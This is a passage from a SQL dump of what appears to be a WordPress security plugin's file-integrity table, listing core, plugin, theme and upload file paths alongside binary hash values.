','pX���uc{�-�Kژ�/OnE0���)JB','',0,'?'),('�0���R�J�{y�ˣ��','wp-includes/general-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѹ0�\ZZ�a�!�$\np�D','\\�u���������Z6������ι','',0,'?'),('�BE���|$!���5','wp-content/plugins/wordpress-seo/src/presentations/indexable-author-archive-presentation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�F�M״�sˤ�\'�','�{8Cg�(�:y&E�V<ճ���r<','',0,'?'),('�C�7<m�l�@��}z','wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-1-300x200.jpg',0,'ZK��s�[��#J ��T','ZK��s�[��#J ��T','k�a����}G�F��q�>�$d+��q\"��','',0,'?'),('�F �8�+�)��r�P�','wp-admin/images/no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�d�$��ܟV7�','\n�>���~h�Z���P\0�U0�;\' {�) �>','',0,'?'),('�M\Z���H�?ͲZ','wp-includes/class-wp-rewrite.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c���x�X��C��u%#','ݐ/#N`j�R�1�t+��s�W�]�~S���mǗ','',0,'?'),('�Oӿ�;�=\\J�zy','wp-includes/js/tinymce/plugins/wpgallery/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xlo�)\r����\r�\\��','��98�n| �W@ѭ|݃v��p5�����l��','',0,'?'),('�QF�0t�+�����','wp-includes/css/dist/block-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cļ�㰦hJ|:R�5�','bǕM�T-[/\np��Cw\0�1��\\K�����y�','',0,'?'),('�_�1t=qT�Q�*�F�','wp-includes/blocks/gallery/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xP���F\r��>','K�7G�,.r.��ȯ�e�!A��+0J5�4','',0,'?'),('�a��u\"9s?�H����','wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%1�s���ËG','E��Wٳ�?�4��@U?�0���bP�+�h','',0,'?'),('�s��Zz�`x�mf: ','wp-content/themes/twentytwentyone/assets/sass/01-settings/global.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���]��c��ț��&','mrO�z�Iy�Dz��q�v�˘qZ�����i�','',0,'?'),('���t�\\��}\rk���','wp-content/plugins/wordpress-seo/admin/views/class-yoast-feature-toggle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ѹ�5=@C��7E���','գ��ai�j���T�N+�������Ip)�','',0,'?'),('�x�D�.���m~<�2','wp-content/plugins/wordfence/images/ratelimiting.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0[��M�ɞ�yP��','�@����S��y\'�N+�k�B��3�J!PbƖ�','',0,'?'),('둪�\09�R�yg��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/CurlMultiHandler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t�B\rUm����o�c\'>�','bxy���(���N�������(Cb��','',0,'?'),('뭷\r�!z}ML�K�E','wp-includes/ms-files.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�]G���y��2D','�Z�h�x�^�/������#���Z^N��_\Z','',0,'?'),('��Sڰp��GMǯ�l�','wp-includes/css/media-views.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���p�I�EB]�!�Ip','��4LD�\0��/T1:HkZ�3�M���0��','',0,'?'),('�2�|�?�]���ϸ�','wp-includes/css/dist/nux/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\"��:J��k�','i?h�_\'��\Z����_��\n��<a2��m^q','',0,'?'),('���F��p�s��4�','wp-content/plugins/wordfence/images/back_enabled.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���]����H��','���9퇥)R�$px#��q ������{#L�O�','',0,'?'),('�֍[1���땰5E�','wp-content/plugins/wordpress-seo/src/conditionals/third-party/elementor-edit-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�v�$���)���','�-�Uy�b�!IuK��]Z�0�*�yf�5�a','',0,'?'),('��vA�ds�����K�]','wp-admin/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','xS���v�N���','�� u�����yA�Ү�B���(��B6�����','',0,'?'),('��YC��o�oR�亞�','wp-includes/capabilities.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c�ӀB�MFe��>��w',',\0�F̬0��|Ї�+��!4$1�Z��R�)a','',0,'?'),('�ۅnPE6��T����','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��KdW���ؿE�W��','�R��W].da����s��JM�Lq+p�},�','',0,'?'),('���.㵓~�X�ѹ7�','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemaps-cache-validator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0JJɷr}�8�Yu�',';��i��ؼR���C��?���.�ۭ\neO','',0,'?'),('�+��^�њ��\r�k','wp-content/plugins/wp-cerber/assets/flags/is.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4o�$�^z1�T�ɪ�','�XƠ8�\'��*ӱ4�$���G\"��JD8�@�6','',0,'?'),('�7X*���Y��1 �','wp-content/uploads/2019/08/rent-updraft-pre-smush-original.jpg',0,'繇1��T0�H��Œ�','繇1��T0�H��Œ�',' �|}J}�R�����<���+�ZT�pIr��L4','',0,'?'),('�8�ڧ��s}�ն�Ni','wp-includes/class-phpmailer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'��F!;� 24�&','G��ZG����5�_ܚ��XS[W��S:9p@�?�','',0,'?'),('�?����h�����;','wp-includes/js/quicktags.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʵ��> %�nK�{<5','mwd���^ʋ�\r��1�^K��(<nV����','',0,'?'),('�D\rh}�����!\n','wp-includes/js/jquery/ui/effect-drop.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[/�Zo[�Ǵ��/.','ʧ���^5��S]@\"�� 9�~G��[Tv8�7�','',0,'?'),('�MX�?�\n�(�\"�','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-ko_KR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��r�{{�բw%gYp�','�+X҆>hp\\M�i�S� 2���t�]��f��','',0,'?'),('�Pط��悇̺ƴ$@�','wp-includes/SimplePie/HTTP/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':p��d\'�$�/','��=�D��=u�~�Ju`�Y[�#*�Γ�','',0,'?'),('�V���A`\"�1=�i','wp-content/plugins/redirection/modules/nginx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','߭h�����[Ix�X5','��9s�ǖ\r���\"�Ě�Q��Mv!���-��','',0,'?'),('�{VcR��>�ԈA��','wp-includes/blocks/code/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R�����̕{C��c��','����5�$�%\n/����t��\'W&�����','',0,'?'),('�}(^��8,~hyg���','wp-content/plugins/wp-cerber/wp-cerber.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7U����ག����','|��b�>[�=��4��ϼ�����n.','',0,'?'),('�|�`y�YĶ�����o','wp-content/themes/twentytwentyone/postcss.config.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��446ZN�p���T','=SmV��5�9�H�bS�V�u��b��:r�?���','',0,'?'),('�b5A�b�\r�$�#;9','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/PumpStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���I�Sɢ��&!z','��?���C���F�Z��1;��^����X��','',0,'?'),('��c��.D�r� |��','wp-includes/js/tinymce/skins/wordpress/images/dashicon-no.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R���Z�?f.��8�� ','��.c%�c�*G~�բ>�Yd���:�7�j','',0,'?'),('츃�v��6�;�~�','wp-includes/js/tinymce/utils/mctabs.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','끡�\"Y����>xU季','%�Y}ڿ�&)���MaYg��Ѝ���*�l�','',0,'?'),('��!<����B4\ZS�}','wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����le�@1��-�','��+ [P\r�i-��b0m����ƥ�M\"�#��@','',0,'?'),('�[���Ӄ��2�W','wp-content/plugins/wordfence/views/waf/options-group-basic-firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[><\r�w���w�ɴ','���T;��F����5@>X�s�F�#�&�$','',0,'?'),('�-x�(�E�oI�=�','wp-includes/class-wp-customize-section.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`;�V�\'���(��)','�<s�Jm�ha�!������U\0(0�D\'�F�','',0,'?'),('���9�+�K��*','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/ServerRequest.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R7y��DFA:N\n�I��','�>��M2v%���`ǰם��-�G��0����9u','',0,'?'),('�Ư��0~\rjA4u','wp-includes/css/customize-preview-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E��?��nZ���d�-','G���i�\rl�iU^��n��rm�5��Ώۻ�\\l�','',0,'?'),('�\\�S�Շ��8��;2','wp-includes/class-wp-tax-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��}���nBJw�k�0','��,�In����\n���E,��@�h�1����','',0,'?'),('���mה��F@$�~r','wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F凅���٥��o�','�?�jr��-��m�(Ǻ���w�?`�Y���~�','',0,'?'),('�\'tPRt���\0��|?X','wp-content/plugins/wordpress-seo/images/brushstroke_background.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n>\n����8��','��[��3*�X����٬+`6���F����a�m','',0,'?'),('�4����E\"\nmB*ȇ','wp-content/plugins/redirection/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"9��sF:�t�\rG��','���F�}�Ռ���O�X���� #����#�','',0,'?'),('�N��\'�!\rB�j��3�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\H��!#���>b�W��','�&�x��w�α�h��)�œ@5m��.)9�R','',0,'?'),('�OR(ǹ����O��','wp-content/themes/twentytwenty/assets/js/customize.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&�S�a�N���x0�e\\','\ZY_��tz�)8��b#���D}%]��Dmy��YV�','',0,'?'),('�]��@�\n��>ĺ�Yn','wp-admin/admin-post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S}d��D��TN�\"F�','F�ԝ�q��`�멾���r_���Ȩ_���\'��I','',0,'?'),('�k.�OjM�S��ß','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-ancestor-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M3`Yǹ �S�5�SS','�=,V(��#��_��5�Mڨ��܇P��','',0,'?'),('���I0��B,�hʛp','wp-includes/class-wp-term-query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����$\0��>c�\rA','\\9�ÆW�->p�>\\ĴG��A�\"K�','',0,'?'),('�>LT��Ơ�z#Pkó','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/TransferException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Y�z�c�(�pc^\n','�\Z�k|�!�`mS8KW������|fo?��,;','',0,'?'),('�������賮]','wp-includes/customize/class-wp-customize-code-editor-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��jM�і���lM��_','�xFZ�Kc��3�7�`Ԫ$j�g�]�Q��','',0,'?'),('�Z�\Z�5\n�j�}�@','wp-includes/blocks/buttons/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'2u%�Bpp�rJpN5','�DR19��گK;��ye����h�\0.�e�D#F@','',0,'?'),('�F�����m���','wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<��>sZ�K�z�e','�̆;�n�E��!��Z�\ZV��V H��w','',0,'?'),('�Z�\ZaYH\0 �5�~ ','wp-admin/includes/class-wp-automatic-updater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#\0�c%K\"��v�C:�U','.[A�ׄ�9F���\"��DgA4t)ʡh�m�!�','',0,'?'),('�QR\"��@3��v�S','wp-admin/js/link.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','϶�5���֞��P�','O�n��n���˕�{?���Q!�=����V�oi��','',0,'?'),('�(\"A���S^�','wp-content/plugins/redirection/locale/json/redirection-gl_ES.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3/a^��2�����a(','�|!O\Z~�~b�g5%�a��}�ѧ|�^{+<m','',0,'?'),('�G� ��~���`�','wp-includes/customize/class-wp-customize-nav-menu-name-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7�f�W�՚7���','p��v�w ��ܪ9����?���a���z�','',0,'?'),('��f�W�4���%���','wp-content/plugins/wp-cerber/assets/flags/nz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X �7�7��c.�ujߖl','4ȯYI4�T)��H�;�rd�Q��g���Ӆ','',0,'?'),('��Jی�I����a��','wp-content/plugins/wordpress-seo/admin/config-ui/fields/class-field-profile-url-instagram.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u�^P���5KAZz��','D��$8s+\n�D�v�pe�v1L�V�%u','',0,'?'),('��M�B�!:�','wp-content/plugins/wp-cerber/assets/flags/it.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{/�z]�>��F@�B�','ⴟ��k �9b��md6�l�{e� o���','',0,'?'),('��U��E�Kڂ*�U','wp-includes/blocks/gallery/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5�n�ˌhV�����h','��nЃ���M]5�Lw\0p�n�Z�~R7B����','',0,'?'),('��\Za�]]�A��\'h���','wp-admin/network/settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��2�/�:?f}�','���0�Q���SģǩGT��P��-�R\Z�\\','',0,'?'),('����=�c�ه���','wp-admin/includes/upgrade.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�sUE}�i,�x��p��','c�fX� �g�\Z�5�GϻZ��6gq3=�ez�','',0,'?'),('��eC����Di!��','wp-admin/css/colors/coffee/colors.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�9���Z���j��','F1�p�F)Ed��E�-<Uo�s�6L�{�Dq��5','',0,'?'),('���f�%u�P���','wp-includes/js/mce-view.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����<��@^�P�\'','#�� ��\\P�Wdqߋ��.��4Ó��x<�','',0,'?'),('�\Z���{:\Z���4f','wp-includes/js/customize-preview-nav-menus.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[Nm �l�VҪ3���','�5,��M3�5��n(tL5��;^��P/9z���8','',0,'?'),('�I;�qV���F��~+','wp-content/plugins/wordfence/js/jquery.dataTables.min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<\\�� �͕�h�','v�Ao;�uD�3$�WB95�_\"��� �','',0,'?'),('�.�z��&���.�1y��','wp-includes/css/dist/format-library/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�t���A8�x��l�','K�cK��&�2�\0���=��g�.�ٜ�� \0y','',0,'?'),('�0�+W�o��^�,�','wp-content/plugins/wordpress-seo/js/dist/network-admin-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J[��*��2�Q��4ԑ','�JW0g\\���x���`�{���̡�Yy���kPKC','',0,'?'),('�F-��v�C�V���S','wp-content/uploads/2019/08/rent-300x250.jpg',0,'�x g\nߨ����ɺ','�x g\nߨ����ɺ','�`��g���FǸ~�S�M�C)��>��&','',0,'?'),('�d`W��q���&�m�','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-prepare-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Bl.l}��X̱0���','l~�P�n׀y�%KSV�`[s��m`�3/Kt�Z�','',0,'?'),('�yѼ5��!*�� ��','wp-content/themes/twentytwentyone/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�gd�w���}�$\'e�','E�u)��l��E�4����觏�篓�W���zF','',0,'?'),('�8j�*9ȵ�3��:�','wp-content/uploads/2019/08/Massages.jpg',0,'�N`>�G�jW����0','�N`>�G�jW����0','��L\0��z��I�>1J���GXڧ�t�H���','',0,'?'),('�F��>�!8u','wp-content/plugins/wordpress-seo/admin/class-premium-popup.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E����k�2��È�','8������kf��\0w��S��D��~e��s*��8','',0,'?'),('-э~�t��+�Y','wp-content/uploads/2019/08/IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME-150x150.jpg',0,'�$K������n7u�o','�$K������n7u�o','`C��OP�7<\'�\n-�\0f&�=�B����S���','',0,'?'),('�<�7v��Y6?���','wp-includes/blocks/separator/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��]=�u\'\\DE�T�','.f�L��]�Ã�Zb�|�%�{�M8�Ƅ�Q�p2^','',0,'?'),('���_e�m>���1�V��','wp-content/plugins/wordpress-seo/src/integrations/watchers/indexable-post-type-archive-watcher.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n��Bz?�6���e�`','�?Y��9k���d�b`�6�e�� �_/�','',0,'?'),('�ί��?�gW���9','wp-includes/blocks/embed/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&J��A�*[��R��-','_=�nF��c5��Ĥ���s�d�1�%���','',0,'?'),('��N���F�V�Y�C','wp-includes/blocks/shortcode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0t� �ڨ.�j�','{��bw\n~��4�n\"��\"�����#.m�/#1','',0,'?'),('��uy�؟�uV��@/��','wp-includes/class-wp-block-patterns-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vμ�W��a�J��W�','B6b>C�^�w��D�\"`��S/05琁�H9�','',0,'?'),('����wK��\"g�\r�','wp-content/plugins/redirection/models/log/log-404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S���l��D��<7�','ϑ�OܕS���]|&��0B_2� ]�oC�','',0,'?'),('��x#\0jF�����p','wp-content/plugins/wordpress-seo/css/dist/score_icon-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�F�\Z(\Zo;�,G�','`Ӷ�yyG��׆\'ߧ����suP&�o��e','',0,'?'),('��C��bp$��l�S;:','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/special-pages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`��1C��s��D���','D����قV/�Δ��Z6�V=��ZF�L,�7','',0,'?'),('����D��nk���','wp-content/themes/twentytwentyone/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4f]�U)�W�\"��=','$��`j0�ɒ�c�1-�K@\rf��n�R�3T�','',0,'?'),('�.�l������괖e�','wp-content/uploads/2016/11/wood-fibre-boards-2728937_960_720-updraft-pre-smush-original.jpg',0,'�6`�엀!����\Z��','�6`�엀!����\Z��','C�� v�\0ABfJ\'f0��=/=�|�','',0,'?'),('�@}&�J~�¾&��\0','wp-includes/customize/class-wp-customize-new-menu-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��N��p��aC�q�k','�F��0�Hyce�LuQ���&��LiH\n�DũK','',0,'?'),('�!��K�[_m|�\0�.','wp-content/plugins/redirection/locale/json/redirection-hr.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�0|��e��[��Ί�','��$��2ݫ -1��U,{g�M�����_��','',0,'?'),('�;L�t�C����ɣ','wp-content/plugins/wordfence/tmp/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�I�z~�i�,L���',' ��HQI�qz�ڤ�p�9�C4>H���3���G','',0,'?'),('�H\Z���.���hR�bn','wp-content/plugins/wp-cerber/assets/flags/io.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��<���e�e���C�','��ɫ-�)i�l�\na�1��}!�}~���� pd�','',0,'?'),('�P?~��&�\n0]���','wp-content/plugins/wp-cerber/languages/wp-cerber-nl_NL.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����k\r4�h�(','{����u�)��=qm��$g�3���b�','',0,'?'),('�Y^~5~��p�G-���','wp-includes/js/customize-views.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Hӷ�-\\Me���','�b����L��-���9wlo��y�$+�Y\Zޘ�N','',0,'?'),('�_�����ې\r���','wp-content/plugins/wordpress-seo/src/conditionals/conditional-interface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�5E�\Z-���1��','�A�;���ɜ�K���_���#Hz�T�~�:','',0,'?'),('�jU��3�0<�g��b','wp-includes/blocks/paragraph/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(���:�t�Me&�>','�ʟ�ω���P�Xw��P�\0�ޤop���l�Ҷ','',0,'?'),('�q��\0�,8���>','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general/title-separator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[��7D��u�����t�',',\\����gU��QS��nǥ8���f3�_E','',0,'?'),('�rI����ɀ5 �F�','wp-includes/Requests/Exception/Transport.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��l��z�� J�^�','����ĺ�̌��&���ֳ���4@78���p','',0,'?'),('�u_����~!\0�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Precomp.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y=\nY�99�2���','���6���\Z/���p�y5��E�ح���O�E','',0,'?'),('�z������|�z�xv','wp-includes/js/jquery/ui/droppable.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>���K�-�E،�N�','�\\�\'䰹\"�jq#�7��ER��F�0*�-�;|','',0,'?'),('����˕��r&�q�Fi','wp-content/plugins/wordfence/crypto/vendor/composer/installed.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K:�Q�)�˸�:-*','��8}�ު�]��\"1���&(��䙄�����','',0,'?'),('�1�3�\"ȟ�fˬ','wp-content/plugins/redirection/locale/json/redirection-en_CA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��xcB����~Lo]\Z�','N���d��^�|���������.�U��8h�\\1','',0,'?'),('���1d�YEa$�','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/paper-content/general/force-rewrite-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=�ӡc2���@k����','�J-h\\��QK<\nb�\".m�[�(AU!ϕGĎ','',0,'?'),('�;��+�&Y��Đ','wp-content/plugins/wp-cerber/assets/multi/multi.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z/�Wn�U#֬��V�K','��\"��%����6�rH��B)�xf�L]4t��','',0,'?'),('�BJ���=4�����','wp-content/plugins/wordpress-seo/admin/tracking/class-tracking-plugin-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g��\'��+�*GL','E(���qA֬h��m�efa��A�\n>�}���@�','',0,'?'),('��u�+���ޢ��','wp-content/plugins/wordpress-seo/src/routes/semrush-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�3�^%��Ļ�ɣ̪�','���*���o��P�s:7�ݹ/�x�N�?ث5','',0,'?'),('リQ�����)B\n�,','wp-content/plugins/wordfence/images/loading_large.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Y��{Ob�UW~�Y˙','p8�\'��� t���:�Q�o]{5G1����E��','',0,'?'),('��P��a`Xu','wp-admin/css/color-picker-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��i��S-MؼF�N','m\Z�Lչ����ο�1m�aɤ�Rr�1A7','',0,'?'),('��{�� \r�Slſ� ','wp-content/plugins/wordfence/views/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('�ʮ���+�A:\'.X','wp-content/plugins/all-in-one-wp-security-and-firewall/languages/all-in-one-wp-security-and-firewall-fr_FR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z��\ny.�C�','���L�#g�N����V{�����c�$��Ub','',0,'?'),('��X=U�pfp���Z','wp-includes/taxonomy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ho(HAO�>���7�','s%˒#����pG��/°e0�UQD��՚�','',0,'?'),('���4�~��^U1Ex��','wp-includes/blocks/site-title/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"X�\"OK��9\0�','} ����k_[3�?_�Fx�a������','',0,'?'),('��诠��s�D�U����','wp-content/plugins/wordpress-seo/src/config/migrations/20200408101900_AddCollationToTables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','٧߬a6%�\Z�p�\r�~','J���y�.Lu�d߽�&�M���/\"H�=��١Y','',0,'?'),('�ތt+�\\�+�Xa�ZU','wp-content/plugins/wordfence/lib/wfScan.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qdb\r�`俷����','��M)�HMXhn���\'TD�h��`�','',0,'?'),('�㯩� \'��ި��V','wp-includes/images/smilies/icon_biggrin.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�K��Jr��:�]kI�|',':������ٔ���M����X% �<8�g4�','',0,'?'),('��6X�Ԫ4��[_��=t','wp-content/plugins/wordfence/lib/wfScanEngine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%ZC��l�&+8\Z�I','��8�!m��m(7�s���@�9*+4�n��c��','',0,'?'),('��c��G���(`E��','wp-content/plugins/wordfence/views/scanner/issue-configReadable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"Xjoz�o���Y���','��{�g�k{aK���*����W��ׅ�$ף','',0,'?'),('��9��r�Mԧ��','wp-includes/js/customize-preview-widgets.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T-�6�P)H�=��','����6ª�e����yмbdf}��5��','',0,'?'),('��rS�\'��qx���','wp-content/uploads/2016/11/roof-plate-768x508.jpg',0,'�᧦�߿{$B���ߏ6','�᧦�߿{$B���ߏ6','�������Kn^\"�A�`���\0U�.Ƕ])>�v','',0,'?'),('� �ލ<:9�|��6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/Curve25519/H.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-_�b�->O��\\苃','�sɔg�%��riC��P��w��%��{��J��','',0,'?'),('���6)Jo*��Nn+','wp-includes/js/dist/vendor/wp-polyfill-object-fit.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/Ɋz,�ثcm�-�|}1','�;>����;�\\��\Z�p;��^�G�?_�\n6','',0,'?'),('�$�ī�I�^��3���','wp-admin/menu-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�P�j�v�˨!ң�','w��9=̠F5d��oU���\\_�k[�','',0,'?'),('�:k\n�:��_9)jPp�','wp-includes/blocks/tag-cloud/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sE�,�Cj����ిP','�u\nah�Fz��f�\\�\r�g��m�q�','',0,'?'),('�I/\Z�N�2�����p','wp-includes/sodium_compat/src/Core32/Ed25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�0� 